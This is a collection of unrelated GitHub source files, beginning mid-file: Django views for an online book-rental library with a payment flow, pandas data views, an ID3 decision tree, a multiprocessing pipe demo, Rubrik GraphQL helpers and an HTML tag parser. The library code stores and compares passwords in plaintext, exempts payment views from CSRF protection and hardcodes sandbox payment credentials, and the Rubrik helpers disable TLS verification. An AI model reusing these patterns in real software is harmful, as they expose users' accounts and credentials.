(fname, lname, email, password, nid, phone, address, age) values (%s, %s, %s, %s, %s, %s, %s, %s);\", [fname, lname, email, password, nid, phone, address, age])\n cursor.execute(\"insert into rent_provider (user_id) values (%s);\", [nid])\n cursor.execute(\"insert into rent_taker (user_id) values (%s);\", [nid])\n\n return redirect(\"confirm_reg\")\n except:\n return render(request, \"user_reg/user_reg.html\")\n \ndef confirm_reg(request):\n return render(request, 'user_reg/confirm_reg.html')\n \ndef loginUser(request):\n try:\n if(request.method == \"POST\"):\n email = request.POST['email']\n password = request.POST['pw']\n\n with connection.cursor() as cursor:\n cursor.execute(\"select * from user where email = %s and password = %s\", [email, password])\n login_dets = cursor.fetchone()\n\n with connection.cursor() as cursor:\n cursor.execute(\"select * from book where provider_id = %s\", [login_dets[0]])\n user_books = cursor.fetchall()\n \n if(email == login_dets[3] and password == login_dets[4]):\n # return render(request, 'user_reg/dashboard.html', {'data' : l, 'data1':ub})\n # return user_dashboard(request, login_dets, user_books)\n # return Dashboard(login_dets, user_books)\n request.session['user_info'] = login_dets\n request.session['user_books'] = user_books\n return redirect('user_dashboard')\n \n\n else:\n #messages\n return render(request, \"user_reg/login_user.html\")\n \n except:\n return render(request, \"user_reg/login_user.html\")\n\n\ndef user_dashboard(request):\n l = request.session.get('user_info')\n ub = request.session.get('user_books')\n # info = request.session.get('registered_info')\n\n with connection.cursor() as cursor:\n cursor.execute(\"select book.book_id, name, author_name, genre, publisher, rent_cost from book inner join author where book.book_id = author.book_id and book.provider_id = %s;\", [l[0]])\n uub = cursor.fetchall()\n\n with connection.cursor() as cursor:\n cursor.execute(\"select book.book_id, book.name, book.copy_number, author.author_name, rents.rent_date, rents.rent_end_date, book.provider_id, user.phone from book inner join author on book.book_id = author.book_id inner join rents on book.book_id = rents.book_id inner join user on book.provider_id = user.nid where rents.rent_taker_id = %s;\", [l[0]])\n rented = cursor.fetchall()\n\n with connection.cursor() as cursor:\n cursor.execute(\"select book.book_id, book.name, author.author_name, book.copy_number, payment.paid_by from book inner join author inner join payment where book.book_id = author.book_id and payment.book_id = book.book_id and payment.received_by = %s;\", [l[0]])\n rented_to = cursor.fetchall()\n return render(request, 'user_reg/dashboard.html', {'data':l, 'data1':ub, 'data2':uub, 'data3' : rented, 'data4' : rented_to})\n\ndef upload_book(request):\n try:\n user_info = request.session.get('user_info')\n # print(user_info[0])\n\n if(request.method == \"POST\"):\n book_name = request.POST['book_name']\n author_name = request.POST['author']\n genre = request.POST['genre']\n copy_no = request.POST['copy_no']\n publisher = request.POST['publisher']\n rent_cost = request.POST['rent_cost']\n \n\n with connection.cursor() as cursor:\n cursor.execute(\"insert into book (book_id, name, genre, copy_number, publisher, rent_cost, provider_id) values (%s, %s, %s, %s, %s, %s, %s);\", [0, book_name, genre, copy_no, publisher, rent_cost, user_info[0]])\n cursor.execute(\"select book_id from book where name = %s and provider_id = %s;\", [book_name, user_info[0]])\n book_id = cursor.fetchone()\n cursor.execute(\"insert into author (book_id, author_name) values (%s, %s);\", [book_id[0], author_name])\n result = cursor.fetchone()\n\n if(result == None):\n return redirect('user_dashboard') \n\n return render(request, 'user_reg/upload_book_front.html')\n except:\n return render(request, 'user_reg/upload_book_front.html')\n \n\ndef search_book(request):\n try:\n if(request.method == \"POST\"):\n book_n = request.POST['book_name']\n \n user_info = request.session.get('user_info')\n\n book_n = book_n + '%'\n with connection.cursor() as cursor:\n cursor.execute(\" select book.book_id, name, genre, copy_number, publisher, book.rent_cost, book.provider_id, user.fname, user.lname, book.book_id, author.author_name from book inner join author on book.book_id = author.book_id inner join user on book.provider_id = user.nid left join rents on book.book_id = rents.book_id where rents.book_id IS NULL and book.provider_id != %s and book.name like %s;\", [user_info[0], book_n])\n search_result = cursor.fetchall()\n print(search_result)\n\n names = []\n for i in range(len(search_result)):\n with connection.cursor() as cursor:\n cursor.execute('select fname, lname from user where nid = %s', [search_result[i][6]])\n user_name = cursor.fetchall()\n names.append(user_name)\n\n # print(names)\n print(user_info)\n\n request.session['book_details'] = search_result\n print(search_result)\n\n return render(request, 'user_reg/search_book.html', {\"d1\":search_result, 'd2' : user_name, 'd3' : names})\n except:\n\n return render(request, 'user_reg/search_book.html')\n \ndef confirm_rent(request, pk):\n book_details = request.session.get('book_details')\n print(book_details)\n\n with connection.cursor() as cursor:\n cursor.execute('select fname, lname from user where nid = %s', [book_details[0][6]])\n user_name = cursor.fetchall()\n print(user_name)\n\n book = Book.objects.get(book_id=pk)\n author = Author.objects.get(book_id = pk)\n checkout_dets = [book.rent_cost]\n request.session['book_details'] = checkout_dets\n chosen_book = []\n\n with connection.cursor() as cursor:\n cursor.execute('select * from book where book_id = %s', [pk])\n a = cursor.fetchone()\n chosen_book.append(a)\n\n request.session['chosen_book'] = chosen_book\n\n # with connection.cursor() as cursor:\n # cursor.execute(\"select lp_number from delivery_man where provider_id is NULL order by rand() limit 1;\")\n # lp_no = cursor.fetchone()\n\n # print(lp_no)\n\n # with connection.cursor() as cursor:\n # cursor.execute('select user.address from user inner join book where book.provider_id = user.nid and book.provider_id = %s;', [chosen_book[0][6]])\n # address_provider = cursor.fetchone()\n\n # print(address_provider)\n\n return render(request, 'user_reg/confirm_rent.html', {'d1' : book_details, 'd2' : user_name, 'book' : book, 'author' : author})\n\n@csrf_exempt\ndef payment(request):\n # user_info = request.session.get('user_info')\n # book_details = request.session.get('book_details')\n\n try:\n today = date.today()\n till = today + timedelta(days=7)\n rent_start = str(today)\n rent_end = str(till)\n user_info = request.session.get('user_info')\n print(user_info)\n book_details = request.session.get('book_details')\n # print(book_details)\n chosen_book = request.session.get('chosen_book')\n print(chosen_book)\n settings = { 'store_id': 'onlin64dd360da6a67', 'store_pass': 'onlin64dd360da6a67@ssl', 'issandbox': True }\n sslcz = SSLCOMMERZ(settings)\n post_body = {}\n post_body['total_amount'] = book_details[0]\n post_body['currency'] = \"BDT\"\n post_body['tran_id'] = \"1\"\n post_body['success_url'] = \"http://127.0.0.1:8000/confirmed_pay/\"\n post_body['fail_url'] = \"http://127.0.0.1:8000/dashboard/\"\n post_body['cancel_url'] = \"http://127.0.0.1:8000/dashboard/\"\n post_body['emi_option'] = 0\n post_body['cus_name'] = user_info[5] + ' ' + user_info[6]\n post_body['cus_email'] = user_info[3]\n post_body['cus_phone'] = user_info[1]\n post_body['cus_add1'] = \"customer address\"\n post_body['cus_city'] = \"Dhaka\"\n post_body['cus_country'] = \"Bangladesh\"\n post_body['shipping_method'] = \"NO\"\n post_body['multi_card_name'] = \"\"\n post_body['num_of_item'] = 1\n post_body['product_name'] = \"Test\"\n post_body['product_category'] = \"Test Category\"\n post_body['product_profile'] = \"general\"\n\n response = sslcz.createSession(post_body) # API response\n print(user_info)\n print(response)\n\n if(response['status'] == \"SUCCESS\"):\n print(response['sessionkey'], user_info[0], chosen_book[0][6], chosen_book[0][5], chosen_book[0][0])\n with connection.cursor() as cursor:\n cursor.execute(\"insert into rents (rent_taker_id, book_id, rent_date, rent_end_date) values (%s, %s, %s, %s);\", [user_info[0], chosen_book[0][0], rent_start, rent_end]),\n cursor.execute(\"insert into payment (t_id, paid_by, received_by, amount, book_id) values (%s, %s, %s, %s, %s);\", [response['sessionkey'], user_info[0], chosen_book[0][6], chosen_book[0][5], chosen_book[0][0]])\n \n with connection.cursor() as cursor:\n cursor.execute(\"select lp_number from delivery_man where provider_id is NULL order by rand() limit 1;\")\n lp_no = cursor.fetchone()\n\n with connection.cursor() as cursor:\n cursor.execute('select user.address from user inner join book where book.provider_id = user.nid and book.provider_id = %s;', [chosen_book[0][6]])\n address_provider = cursor.fetchone()\n\n with connection.cursor() as cursor:\n cursor.execute(\"UPDATE delivery_man SET provider_id = %s, provider_address = %s, recipient_address = %s, deliver_to_nid = %s WHERE delivery_man.lp_number = %s;\", [chosen_book[0][6], address_provider[0], user_info[2], user_info[0], lp_no[0]])\n\n print(response)\n return redirect(response['GatewayPageURL'])\n \n except:\n return render(request, 'user_reg/confirm_rent.html')\n \n@csrf_exempt\ndef confirmed(request):\n return render(request, \"user_reg/confirmed.html\")","repo_name":"Raahim-Rubaiyat-Teertho/Online_Library","sub_path":"library/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1947819341","text":"from django.conf import settings\nimport os\nimport os.path\nfrom django.shortcuts import render\nfrom django import template\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import loader\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt,csrf_protect\nimport json\nimport pandas as pd\nfrom IPython.display import HTML\n\nfrom .helpers import (\n CSVToDataFrame,\n MakeDataFrameJson, \n MakeModelCSV, \n ImportCSV, \n TableExportCSV,\n )\n\nmedia_dir = settings.MEDIA_ROOT \nstatic_dir = settings.STATIC_ROOT \n\n\ntransactions = pd.read_csv(f'{media_dir}/data/transactions.csv', parse_dates=['date'])\n\noil = pd.read_csv(f'{media_dir}/data/oil.csv', parse_dates=['date'])\n\nholidays = pd.read_csv(f'{media_dir}/data/holidays_events.csv', parse_dates=['date'])\n\ntest = pd.read_csv(f'{media_dir}/data/test.csv', parse_dates=['date'])\n# In[ ]:\n\n\n# NO DATE COLUMN - 'index_col=0' (index/id column)\nstores = pd.read_csv(f'{media_dir}/data/stores.csv', index_col=0)\n\nsample = pd.read_csv(f'{media_dir}/data/sample_submission.csv', index_col=0)\n\n# LOAD DATAFRAMES\n\n####################################################################\n\n# LOAD CHART SVG\ndef BizView(request):\n\n # MONTHLY W/ FORECAST\n \n\n context = {\n\n }\n return render(request, 'biz/biz.html', context)\n\n@csrf_exempt\ndef LoadDataFrames(request):\n\n template = 'partials/tabbed_view_data.html'\n context = {\n 'train': train,\n 'transactions': transactions,\n 'oil': oil,\n 'holidays': holidays,\n 'stores': stores,\n\n 'test': test,\n 'sample': sample,\n }\n\n return render(request, template, context)\n\n\n@csrf_exempt\ndef LoadCharts(request):\n \n template = 'partials/tabbed_view_charts.html'\n context = {\n \n }\n\n return render(request, template, context)\n\n\n","repo_name":"Monxun/monxun-code","sub_path":"app/home/views/biz_view.py","file_name":"biz_view.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74536326546","text":"import math\r\nimport csv\r\n\r\n\r\ndef load_csv(filename):\r\n lines = csv.reader(open(filename, \"r\"))\r\n dataset = list(lines)\r\n headers = dataset.pop(0)\r\n return dataset, headers\r\n\r\n\r\nclass Node:\r\n def __init__(self, attribute):\r\n self.attribute = attribute\r\n self.children = []\r\n self.answer = \"\"\r\n\r\n\r\ndef subtables(data, col, delete): # col is basically a column header\r\n dic = {}\r\n coldata = [row[col] for row in data]\r\n\r\n attr = list(set(coldata)) # set returns only unique values in coldata\r\n counts = [0] * len(attr) # create empty list for every unique value\r\n r = len(data) # no of rows\r\n c = len(data[0]) # no of columns in each row\r\n for x in range(len(attr)): # no of unique values in the \"col\" column\r\n for y in range(r):\r\n if data[y][col] == attr[x]:\r\n counts[x] += 1\r\n for x in range(len(attr)):\r\n dic[attr[x]] = [[0 for i in range(c)] for j in range(counts[x])] # initialing the dictionary items\r\n pos = 0\r\n for y in range(r):\r\n if data[y][col] == attr[x]:\r\n if delete:\r\n del data[y][col] # removing tat particular column (upper in the tree/parent)\r\n dic[attr[x]][pos] = data[y] # all rows for each unique value\r\n pos += 1\r\n return attr, dic # attr is a list, dic is a set\r\n\r\n\r\ndef entropy(S):\r\n attr = list(set(S)) # S will basically have last column data(not necessarily of all rows)\r\n if len(attr) == 1:\r\n return 0 # if there is either only yes/ only no =>entrop is 0\r\n counts = [0, 0]\r\n for i in range(2):\r\n counts[i] = sum([1 for x in S if attr[i] == x]) / (len(S) * 1.0) # find no of yes and no of no\r\n sums = 0\r\n for cnt in counts:\r\n sums += -1 * cnt * math.log(cnt, 2) # base 2(second parameter)\r\n return sums\r\n\r\n\r\ndef compute_gain(data, col): # col is column-header\r\n attr, dic = subtables(data, col, delete=False) # here no deletion, we just calculate gain\r\n total_size = len(data) # |S| value in formula\r\n entropies = [0] * len(attr) # entropies of each value\r\n ratio = [0] * len(attr) # to maintain |Sv|/|S| values\r\n total_entropy = entropy([row[-1] for row in data])\r\n\r\n for x in range(len(attr)):\r\n ratio[x] = len(dic[attr[x]]) / (total_size * 1.0) # len of dic=> |Sv| value\r\n entropies[x] = entropy([row[-1] for row in dic[attr[x]]])\r\n\r\n total_entropy -= ratio[x] * entropies[x] # acc to formula\r\n return total_entropy\r\n\r\n\r\ndef build_tree(data, features):\r\n lastcol = [row[-1] for row in data]\r\n if (len(set(lastcol))) == 1: # if last column contains either only \"yes\" or only \"no\"\r\n node = Node(\"\") # we are not building the tree further(so no attribute)\r\n node.answer = lastcol[0] # it'll be either yes/no\r\n return node\r\n n = len(data[0]) - 1 # -1 boz we dont need the last column values\r\n gains = [0] * n # gain is initialized to be 0 for all attributes\r\n for col in range(n):\r\n gains[col] = compute_gain(data, col) # compute gain of each attribute\r\n\r\n split = gains.index(max(gains)) # split will have the index of attribute with \"highest gain\"\r\n node = Node(features[split]) # features list will have attribute headings(col names)\r\n # so now we create a subtree (node) with that particular attribute\r\n fea = features[:split] + features[split + 1:]\r\n attr, dic = subtables(data, split, delete=True) # attr will have possible values for tat particular attribute\r\n # dic will have all rows for all those attributes(key: values)\r\n for x in range(len(attr)):\r\n child = build_tree(dic[attr[x]], fea) # for each value of the attribute\r\n node.children.append((attr[x], child)) # again build the tree (but fea exclude the one already taken)\r\n return node\r\n\r\n\r\ndef print_tree(node, level):\r\n if node.answer != \"\": # if its a leaf node\r\n print(\" \" * level, node.answer) # just print \"level\" no of spaces, followed by answer (yes/no)\r\n return\r\n print(\" \" * level, node.attribute) # attribute in the node\r\n for value, n in node.children:\r\n print(\" \" * (level + 1), value)\r\n print_tree(n, level + 2) # recursive call to the next node (child)\r\n\r\n\r\ndef classify(node, x_test, features): # features: column headers\r\n if node.answer != \"\": # this will be true only for leaf nodes(answer: yes/no)\r\n print(node.answer)\r\n return\r\n pos = features.index(node.attribute) # node.attribute will have the col header\r\n for value, n in node.children: # for every value of that attribute\r\n if x_test[pos] == value: # for that particular value go along that value\r\n classify(n, x_test, features) # go deeper in the tree\r\n\r\n\r\ndataset, features = load_csv(\"traintennis.csv\")\r\n# lastcol=[row[-1] for row in dataset]\r\nnode1 = build_tree(dataset, features)\r\nprint(\"The decision tree for the dataset using ID3 algorithm is\")\r\nprint_tree(node1, 0)\r\n\r\ntestdata, features = load_csv(\"testtennis.csv\")\r\nfor xtest in testdata: # xtest is each row in testdata\r\n print(\"The test instance:\", xtest)\r\n print(\"The label for test instance:\", end=\" \")\r\n classify(node1, xtest, features)","repo_name":"Shubhamkumar-op/ml","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":5253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43089801130","text":"\"\"\" \nAutor: GAÑÁN, Tomás \nEntrega 6: Multiprocessing\n\"\"\"\n# Importacion de librerias/modulos\n\nimport signal\nimport os \nimport sys\nimport multiprocessing\n\ndef readPipe(pipe):\n while True:\n message = pipe.recv()\n print(\"\\n Leyendo (PID: %d): %s\" % (os.getpid(),message))\n\ndef readStdin(stdin):\n sys.stdin = os.fdopen(0)\n message = input(\"\\n Escribir mensaje: \")\n stdin.send(message)\n \ndef main():\n pipe, stdin = multiprocessing.Pipe()\n \n proc1 = multiprocessing.Process(target = readStdin, args = (stdin, ))\n proc2 = multiprocessing.Process(target = readPipe, args = (pipe, ))\n \n proc1.start()\n proc2.start()\n proc1.join()\n proc2.join()\n \nif __name__ == \"__main__\":\n main()","repo_name":"tomasganan/ComputacionII","sub_path":"Entrega6/ej9.py","file_name":"ej9.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33433812104","text":"\n\n# This is file contains example python functions to connect to Rubrik Security Cloud\n# and execute RSC GraphQL queries to perform common Rubrik actions.\n# This is designed as guidance system and can be customized to your individual needs.\n# This is a community project and is not supported by Rubrik\n# Author: Jeremy Cathey (Rubrik Platform Solutions Architect)\n# Date: 2023-04-10\n\nfrom RSCQueries import *\n\nimport json\nimport time\nimport requests\nfrom urllib3.exceptions import InsecureRequestWarning\n\n# Suppress the warnings from urllib3\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\n\n\n\n\ndef rsc_connect(json_path):\n # Setup token auth\n json_file = open(json_path)\n json_key = json.load(json_file)\n json_file.close()\n session_url = json_key['access_token_uri']\n payload = {\n \"client_id\": json_key['client_id'],\n \"client_secret\": json_key['client_secret'],\n \"name\": json_key['name']\n }\n headers = {\n 'Content-Type': 'application/json;charset=UTF-8',\n 'Accept': 'application/json, text/plain'\n }\n request = requests.post(session_url, json=payload, headers=headers, verify=False)\n del payload\n response_json = request.json()\n if 'access_token' not in response_json:\n print(\"Authentication failed!\")\n access_token = response_json['access_token']\n\n rscConnect = dict();\n # Setup token auth for direct graphql queries external to the SDK.\n rscConnect['URL'] = session_url.rsplit(\"/\", 1)[0]\n rscConnect['Token'] = access_token\n rscConnect['URI'] = session_url.rsplit(\"/\", 1)[0] + '/graphql'\n rscConnect['Headers'] = {\n 'Content-Type': 'application/json',\n 'Accept': 'application/json',\n 'Authorization': 'Bearer ' + access_token\n }\n print(\"Connected to RSC.\")\n\n return rscConnect\n\n\ndef rsc_execute_graphql_query(rsc_uri, rsc_headers, query, variables):\n # Execute graphQL query based off of passed variables query and variables.\n response = RSC_execute_graph_call(rsc_uri, rsc_headers, query, variables)\n return response\n\n\ndef rsc_livemount_managedvolume(rsc_uri, rsc_headers, mv_name):\n # function call to use the managed volume name to retrieve the managed volume id\n mv_id = RSC_FindManagedVolumeIDByName(rsc_uri, rsc_headers, mv_name)\n # function call to use the managed volume id to retrieve the latest snapshot id\n snapshot_id = RSC_Get_ManagedVolume_LatestSnapshotID(rsc_uri, rsc_headers, mv_id)\n # function call to check if the managed volume is already live mounted\n RSC_Get_ManagedVolume_LiveMountCount(rsc_uri, rsc_headers, mv_id)\n # function call to live mount the managed volume\n RSC_ExportManagedVolumeSnapshot(rsc_uri, rsc_headers, snapshot_id)\n # function call to retrieve the managed volume channel paths\n RSC_Get_ManagedVolume_ChannelPaths(rsc_uri, rsc_headers, mv_id)\n # function call to retrieve the id of the live mounted managed volume\n mv_livemount_id = RSC_Get_ManagedVolume_LiveMountID(rsc_uri, rsc_headers, mv_id)\n return mv_livemount_id\n\n\ndef rsc_unmount_managedvolume(rsc_uri, rsc_headers, mv_name):\n # function call to use the managed volume name to retrieve the managed volume id\n mv_id = RSC_FindManagedVolumeIDByName(rsc_uri, rsc_headers, mv_name)\n # function call to retrieve the id of the live mounted managed volume\n mv_livemount_id = RSC_Get_ManagedVolume_LiveMountID(rsc_uri, rsc_headers, mv_id)\n # function call to unmount the live mounted managed volume\n mv_unmount = RSC_DeleteManagedVolumeSnapshotExport(rsc_uri, rsc_headers, mv_livemount_id)\n return mv_unmount\n\n\ndef rsc_register_vms_bulk(rsc_uri, rsc_headers, vmcount):\n # Get list of vSphere virtual machines that are unregistered\n vm_id_list = RSC_Get_vSphere_VMs_Unregistered(rsc_uri, rsc_headers, vmcount)\n # Pass list of vSphere virtual machines IDs to be registered\n response = RSC_vSphere_RegisterVMs_Bulk(rsc_uri, rsc_headers, vm_id_list)\n return response\n\n\ndef rsc_register_vm(rsc_uri, rsc_headers, vm_name):\n # Call function to get vSphere VM ID from the VM name\n vm_id = RSC_Get_vSphere_VM_ID(rsc_uri, rsc_headers, vm_name)\n # Call function to register vSphere virtual machine\n response = RSC_vSphere_RegisterVM(rsc_uri, rsc_headers, vm_id)\n return response\n\n\ndef rsc_startThreatHunt(rsc_uri, rsc_headers, threathunt_name, cluster_uuid, object_fids, ioc_kind, ioc_value, utc_start, utc_end):\n # pass variables and start a threat hunt\n response = RSC_startThreatHunt(rsc_uri, rsc_headers, threathunt_name, cluster_uuid, object_fids, ioc_kind, ioc_value, utc_start, utc_end)\n return response\n\n","repo_name":"jeremycathey/Rubrik-pyGraphQL","sub_path":"RSCFunctions.py","file_name":"RSCFunctions.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73313150866","text":"\nfrom os import defpath, write\nfrom typing import Literal\nimport urllib\nfrom urllib.request import urlopen\ntry:\n from bs4 import BeautifulSoup\nexcept Exception:\n pass\n\n\"\"\"Globals\"\"\"\nbase_url = \"http://www.blankwebsite.com/\"\ngoogle_url = \"https://www.google.com\"\nglobal rowcounter\nrowcounter = 0\n\n\n\"\"\"Functions\"\"\"\n\ndef closedopentag(htmltag, htmllist: list, row): # html opening tags that are closed i.e <>\n data_tuple = [htmltag, False, '', row]\n htmllist.append(data_tuple)\n\ndef openopentag(htmltag, htmllist: list, line, row): # html opening tags that have attributes / parameters\n new_line = line.strip(htmltag)\n data_tuple = [htmltag, True, new_line, row]\n htmllist.append(data_tuple)\n\ndef closedtag(htmltag, htmllist: list, row):\n sub_list = [htmltag, row]\n htmllist.append(sub_list)\n\ndef checkingelements(textline, htmlelementlist: list): # function to check whether or not an element is a html element and to add the element to a dictionary if it is\n # if statements to determine whether or not to add the data in the dictionary\n html_all_tag_list = [\"\", \"
    \", \"\", \"
    \", \"
\", \"\", \"\", \"\", \"

\", \"\", \"\", \"\", \"\",\n \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\",\n \"\", \"\", \"\", \"\", \"\", \"\", \"\",\n \"\", \"\", \"\", \"\", \"\", \"\", \"\", \n \"\", \"\", \"\", \"\", \"\", \"\"] \n\n html_open_open_tag_list = [\"
\", \"
\", \"\", \"
\", \"